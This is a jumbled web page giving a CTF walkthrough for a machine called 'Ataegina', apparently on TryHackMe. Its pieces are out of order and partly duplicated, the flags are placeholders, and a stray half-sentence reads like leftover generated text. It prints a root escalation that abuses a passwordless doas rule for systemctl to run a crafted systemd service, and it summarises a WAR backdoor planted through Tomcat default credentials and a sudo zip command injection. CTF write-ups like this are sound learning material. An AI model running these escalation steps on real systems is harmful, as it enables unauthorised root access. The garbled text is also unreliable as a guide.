Tarreo

Walkthrough - Ataegina

cat <<EOF > /tmp/root.service [Service] ExecStart=/bin/bash -c 'cat /root/root.txt > /tmp/root_flag' [Install] WantedBy=multi-user.target EOF Run as root via doas:

Check /etc/doas.conf :

cat /tmp/root_flag THMataegina_root_flag | Step | Technique | |------|------------| | Recon | Nmap, dirbusting | | Initial access | Tomcat manager default creds → WAR backdoor | | User pivot | sudo zip command injection | | Root | doas misconfiguration + systemctl abuse | Key takeaway: Always check default credentials, cronjobs, sudo/doas rights, and unusual SUID binaries. ataegina walkthrough

permit nopass ataegina as root cmd /usr/bin/systemctl Create a service: cat &lt;&lt;EOF &gt; /tmp/root

We now have an interactive shell as ataegina . cat /home/ataegina/user.txt THMataegina_user_flag 4. Root Privilege Escalation Check SUID binaries: Root Privilege Escalation Check SUID binaries: Here’s a

Here’s a structured for a CTF machine or challenge named “Ataegina” (likely from a platform like HackTheBox, VulnHub, or TryHackMe).

ataegina walkthrough
Advertising